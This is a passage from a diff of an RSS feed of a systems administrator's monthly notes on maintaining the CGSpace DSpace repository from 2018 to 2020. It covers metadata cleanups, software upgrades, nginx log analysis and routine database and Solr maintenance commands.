+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li> +<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it +<ul> +<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li> +</ul> +</li> +<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li> +<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button +<ul> +<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li> +</ul> +</li> +<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li> +</ul> + + + + August, 2020 + https://alanorth.github.io/cgspace-notes/2020-08/ + Sun, 02 Aug 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-08/ + <h2 id="2020-08-02">2020-08-02</h2> +<ul> +<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values +<ul> +<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li> +<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li> +<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li> +</ul> +</li> +</ul> + + + + July, 2020 + https://alanorth.github.io/cgspace-notes/2020-07/ + Wed, 01 Jul 2020 10:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-07/ + <h2 id="2020-07-01">2020-07-01</h2> +<ul> +<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank +<ul> +<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li> +<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li> +<li>I restarted Tomcat and PostgreSQL and the issue was gone</li> +</ul> +</li> +<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li> +</ul> + + + + June, 2020 + https://alanorth.github.io/cgspace-notes/2020-06/ + Mon, 01 Jun 2020 13:55:39 +0300 + + https://alanorth.github.io/cgspace-notes/2020-06/ + <h2 id="2020-06-01">2020-06-01</h2> +<ul> +<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +<ul> +<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li> +</ul> +</li> +<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li> +<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li> +</ul> + + + + May, 2020 + https://alanorth.github.io/cgspace-notes/2020-05/ + Sat, 02 May 2020 09:52:04 +0300 + + https://alanorth.github.io/cgspace-notes/2020-05/ + <h2 id="2020-05-02">2020-05-02</h2> +<ul> +<li>Peter said that 
CTA is having problems submitting an item to CGSpace +<ul> +<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li> +<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li> +</ul> +</li> +</ul> + + + + April, 2020 + https://alanorth.github.io/cgspace-notes/2020-04/ + Thu, 02 Apr 2020 10:53:24 +0300 + + https://alanorth.github.io/cgspace-notes/2020-04/ + <h2 id="2020-04-02">2020-04-02</h2> +<ul> +<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +<ul> +<li>I updated the fifty-eight existing items on CGSpace</li> +</ul> +</li> +<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts: +<ul> +<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li> +<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li> +<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li> +</ul> +</li> +<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li> +</ul> + + + + March, 2020 + https://alanorth.github.io/cgspace-notes/2020-03/ + Mon, 02 Mar 2020 12:31:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-03/ + <h2 id="2020-03-02">2020-03-02</h2> +<ul> +<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs +<ul> +<li>Tag version 1.2.0 on GitHub</li> +</ul> +</li> +<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a> +<ul> +<li>You need to download this into the DSpace 6.x source and compile it</li> +</ul> +</li> +</ul> + + + + February, 2020 + https://alanorth.github.io/cgspace-notes/2020-02/ + Sun, 02 Feb 2020 11:56:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-02/ + <h2 id="2020-02-02">2020-02-02</h2> +<ul> +<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday +<ul> +<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li> +<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li> +<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li> +<li>The code finally builds and runs with a fresh install</li> +</ul> +</li> +</ul> + + + + January, 2020 + https://alanorth.github.io/cgspace-notes/2020-01/ + 
Mon, 06 Jan 2020 10:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-01/ + <h2 id="2020-01-06">2020-01-06</h2> +<ul> +<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li> +<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI +<ul> +<li>The score is now linked to the DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li> +</ul> +</li> +</ul> +<h2 id="2020-01-07">2020-01-07</h2> +<ul> +<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has +<ul> +<li>The DOI has a score of 259, but the Handle has no score at all</li> +<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li> +</ul> +</li> +</ul> + + + + December, 2019 + https://alanorth.github.io/cgspace-notes/2019-12/ + Sun, 01 Dec 2019 11:22:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-12/ + <h2 id="2019-12-01">2019-12-01</h2> +<ul> +<li>Upgrade CGSpace (linode18) to Ubuntu 18.04: +<ul> +<li>Check any packages that have residual configs and purge them:</li> +<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li> +<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade +# apt-get autoremove &amp;&amp; apt-get autoclean +# dpkg -C +# reboot +</code></pre> + + + + November, 2019 + https://alanorth.github.io/cgspace-notes/2019-11/ + Mon, 04 Nov 2019 12:20:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-11/ + <h2 id="2019-11-04">2019-11-04</h2> +<ul> +<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +<ul> +<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +4671942 +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +1277694 +</code></pre><ul> +<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> +<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; +1183456 +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; +106781 +</code></pre> + + + + October, 2019 + https://alanorth.github.io/cgspace-notes/2019-10/ + Tue, 01 Oct 2019 13:20:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-10/ + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit 
the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. + + + + September, 2019 + https://alanorth.github.io/cgspace-notes/2019-09/ + Sun, 01 Sep 2019 10:17:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-09/ + <h2 id="2019-09-01">2019-09-01</h2> +<ul> +<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> +<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 440 17.58.101.255 + 441 157.55.39.101 + 485 207.46.13.43 + 728 169.60.128.125 + 730 207.46.13.108 + 758 157.55.39.9 + 808 66.160.140.179 + 814 207.46.13.212 + 2472 163.172.71.23 + 6092 3.94.211.189 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 33 2a01:7e00::f03c:91ff:fe16:fcb + 57 3.83.192.124 + 57 3.87.77.25 + 57 54.82.1.8 + 822 2a01:9cc0:47:1:1a:4:0:2 + 1223 45.5.184.72 + 1633 172.104.229.92 + 5112 205.186.128.185 + 7249 2a01:7e00::f03c:91ff:fe18:7396 + 9124 45.5.186.2 +</code></pre> + + + + August, 2019 + https://alanorth.github.io/cgspace-notes/2019-08/ + Sat, 03 Aug 2019 12:39:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-08/ + <h2 id="2019-08-03">2019-08-03</h2> +<ul> +<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li> +</ul> +<h2 id="2019-08-04">2019-08-04</h2> +<ul> +<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it +<ul> +<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li> +<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li> +</ul> +</li> +<li>Run system updates on DSpace Test (linode19) and reboot it</li> +</ul> + + + + July, 2019 + https://alanorth.github.io/cgspace-notes/2019-07/ + Mon, 01 Jul 2019 12:13:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-07/ + <h2 id="2019-07-01">2019-07-01</h2> +<ul> +<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li> +<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: +<ul> +<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li> +<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li> +</ul> +</li> +<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li> +</ul> + + + + June, 2019 + https://alanorth.github.io/cgspace-notes/2019-06/ + Sun, 02 Jun 2019 10:57:51 +0300 + + 
https://alanorth.github.io/cgspace-notes/2019-06/ + <h2 id="2019-06-02">2019-06-02</h2> +<ul> +<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it</li> +</ul> +<h2 id="2019-06-03">2019-06-03</h2> +<ul> +<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li> +</ul> + + + + May, 2019 + https://alanorth.github.io/cgspace-notes/2019-05/ + Wed, 01 May 2019 07:37:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-05/ + <h2 id="2019-05-01">2019-05-01</h2> +<ul> +<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li> +<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +<ul> +<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li> +<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li> +</ul> +</li> +<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li> +</ul> +<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648; +DELETE 1 +</code></pre><ul> +<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li> +</ul> + + + + April, 2019 + https://alanorth.github.io/cgspace-notes/2019-04/ + Mon, 01 Apr 2019 09:00:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-04/ + <h2 id="2019-04-01">2019-04-01</h2> +<ul> +<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +<ul> +<li>They asked if we had plans to enable RDF support in CGSpace</li> +</ul> +</li> +<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +<ul> +<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 + 4432 200 +</code></pre><ul> +<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> +<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d +</code></pre> + + + + March, 2019 + https://alanorth.github.io/cgspace-notes/2019-03/ + Fri, 01 Mar 2019 12:16:30 +0100 + + https://alanorth.github.io/cgspace-notes/2019-03/ + <h2 id="2019-03-01">2019-03-01</h2> 
+<ul> +<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li> +<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li> +<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11 +<ul> +<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li> +<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li> +<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li> +<li>68.15% � 9.45 instead of 68.15% ± 9.45</li> +<li>2003�2013 instead of 2003–2013</li> +</ul> +</li> +<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li> +</ul> + + + + February, 2019 + https://alanorth.github.io/cgspace-notes/2019-02/ + Fri, 01 Feb 2019 21:37:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-02/ + <h2 id="2019-02-01">2019-02-01</h2> +<ul> +<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> +<li>The top IPs before, during, and after this latest alert tonight were:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 245 207.46.13.5 + 332 54.70.40.11 + 385 5.143.231.38 + 405 207.46.13.173 + 405 207.46.13.75 + 1117 66.249.66.219 + 1121 35.237.175.180 + 1546 5.9.6.51 + 2474 45.5.186.2 + 5490 85.25.237.71 +</code></pre><ul> +<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li> +<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> +<li>There were just over 3 million accesses in the nginx logs last month:</li> +</ul> +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; +3018243 + +real 0m19.873s +user 0m22.203s +sys 0m1.979s +</code></pre> + + + + January, 2019 + https://alanorth.github.io/cgspace-notes/2019-01/ + Wed, 02 Jan 2019 09:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-01/ + <h2 id="2019-01-02">2019-01-02</h2> +<ul> +<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> +<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 92 40.77.167.4 + 99 210.7.29.100 + 120 38.126.157.45 + 177 35.237.175.180 + 177 40.77.167.32 + 216 66.249.75.219 + 225 18.203.76.93 + 261 46.101.86.248 + 357 207.46.13.1 + 903 54.70.40.11 +</code></pre> + + + + December, 2018 + https://alanorth.github.io/cgspace-notes/2018-12/ + Sun, 02 Dec 2018 02:09:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-12/ + <h2 
id="2018-12-01">2018-12-01</h2> +<ul> +<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li> +<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li> +<li>Then I ran all system updates and restarted the server</li> +</ul> +<h2 id="2018-12-02">2018-12-02</h2> +<ul> +<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li> +</ul> + + + + November, 2018 + https://alanorth.github.io/cgspace-notes/2018-11/ + Thu, 01 Nov 2018 16:41:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-11/ + <h2 id="2018-11-01">2018-11-01</h2> +<ul> +<li>Finalize AReS Phase I and Phase II ToRs</li> +<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li> +</ul> +<h2 id="2018-11-03">2018-11-03</h2> +<ul> +<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li> +<li>Today these are the top 10 IPs:</li> +</ul> + + + + October, 2018 + https://alanorth.github.io/cgspace-notes/2018-10/ + Mon, 01 Oct 2018 22:31:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-10/ + <h2 id="2018-10-01">2018-10-01</h2> +<ul> +<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li> +<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li> +</ul> + + + + September, 2018 + https://alanorth.github.io/cgspace-notes/2018-09/ + Sun, 02 Sep 2018 09:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-09/ + <h2 id="2018-09-02">2018-09-02</h2> +<ul> +<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li> +<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li> +<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li> +<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li> +</ul> + + + + August, 2018 + https://alanorth.github.io/cgspace-notes/2018-08/ + Wed, 01 Aug 2018 11:52:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-08/ + <h2 id="2018-08-01">2018-08-01</h2> +<ul> +<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li> +</ul> +<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child +[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB +[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB +</code></pre><ul> +<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li> +<li>From the DSpace log I see that eventually Solr stopped responding, so I 
guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li> +<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li> +<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li> +<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li> +<li>I ran all system updates on DSpace Test and rebooted it</li> +</ul> + + + + July, 2018 + https://alanorth.github.io/cgspace-notes/2018-07/ + Sun, 01 Jul 2018 12:56:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-07/ + <h2 id="2018-07-01">2018-07-01</h2> +<ul> +<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li> +</ul> +<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace +</code></pre><ul> +<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li> +</ul> +<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue. +</code></pre> + + + + June, 2018 + https://alanorth.github.io/cgspace-notes/2018-06/ + Mon, 04 Jun 2018 19:49:54 -0700 + + https://alanorth.github.io/cgspace-notes/2018-06/ + <h2 id="2018-06-04">2018-06-04</h2> +<ul> +<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>) +<ul> +<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li> +</ul> +</li> +<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> +<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n +</code></pre><ul> +<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> +<li>Time to index ~70,000 items on CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b + +real 74m42.646s +user 8m5.056s +sys 2m7.289s +</code></pre> + + + + May, 2018 + https://alanorth.github.io/cgspace-notes/2018-05/ + Tue, 01 May 2018 16:43:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-05/ + <h2 id="2018-05-01">2018-05-01</h2> +<ul> +<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface: +<ul> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li> +</ul> +</li> +<li>Then I reduced the JVM heap size from 6144 back to 5120m</li> +<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a 
href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li> +</ul> + + + + April, 2018 + https://alanorth.github.io/cgspace-notes/2018-04/ + Sun, 01 Apr 2018 16:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-04/ + <h2 id="2018-04-01">2018-04-01</h2> +<ul> +<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li> +<li>Catalina logs at least show some memory errors yesterday:</li> +</ul> + + + + March, 2018 + https://alanorth.github.io/cgspace-notes/2018-03/ + Fri, 02 Mar 2018 16:07:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-03/ + <h2 id="2018-03-02">2018-03-02</h2> +<ul> +<li>Export a CSV of the IITA community metadata for Martin Mueller</li> +</ul> + + + + February, 2018 + https://alanorth.github.io/cgspace-notes/2018-02/ + Thu, 01 Feb 2018 16:28:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-02/ + <h2 id="2018-02-01">2018-02-01</h2> +<ul> +<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li> +<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li> +<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li> +<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/">in 2018-01</a></li> +</ul> + + + + January, 2018 + https://alanorth.github.io/cgspace-notes/2018-01/ + Tue, 02 Jan 2018 08:35:54 -0800 + + https://alanorth.github.io/cgspace-notes/2018-01/ + <h2 id="2018-01-02">2018-01-02</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li> +<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li> +<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li> +<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li> +<li>And just before that I see this:</li> +</ul> +<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000]. +</code></pre><ul> +<li>Ah hah! So the pool was actually empty!</li> +<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li> +<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li> +<li>I notice this error quite a few times in dspace.log:</li> +</ul> +<pre tabindex="0"><code>2018-01-02 01:21:19,137 